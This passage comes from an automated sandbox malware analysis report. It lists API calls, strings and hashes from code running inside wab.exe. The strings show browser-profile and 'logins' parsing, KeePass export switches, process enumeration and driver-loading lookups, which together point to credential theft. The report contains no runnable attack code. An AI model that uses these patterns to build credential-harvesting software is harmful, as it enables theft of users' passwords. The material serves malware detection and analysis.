                                                              • memset.MSVCRT ref: 00404200
                                                              • memset.MSVCRT ref: 00404215
                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                              • wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 0040426E
                                                              • memset.MSVCRT ref: 004042CD
                                                              • memset.MSVCRT ref: 004042E2
                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                              • wcscpy.MSVCRT ref: 00404311
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                              • API String ID: 2454223109-1580313836
                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                              APIs
                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                              • memcpy.MSVCRT ref: 004115C8
                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                              • API String ID: 4054529287-3175352466
                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 3143752011-1996832678
                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                              • API String ID: 667068680-2887671607
                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                              • API String ID: 1607361635-601624466
                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT ref: 0040E3EC
                                                              • memcpy.MSVCRT ref: 0040E407
                                                              • memcpy.MSVCRT ref: 0040E422
                                                              • memcpy.MSVCRT ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3073804840-2252543386
                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                              • API String ID: 2899246560-1542517562
                                                              • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                              • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DBCD
                                                              • memset.MSVCRT ref: 0040DBE9
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3330709923-517860148
                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040806A
                                                              • memset.MSVCRT ref: 0040807F
                                                              • _wtoi.MSVCRT ref: 004081AF
                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                              • memset.MSVCRT ref: 004081E4
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                              • String ID: logins$null
                                                              • API String ID: 3492182834-2163367763
                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT ref: 004086DB
                                                              • _mbscpy.MSVCRT ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041087D
                                                              • memset.MSVCRT ref: 00410892
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1010922700-0
                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 4233704886-1717621600
                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2012295524-70141382
                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                              Strings
                                                              Memory Dump Source
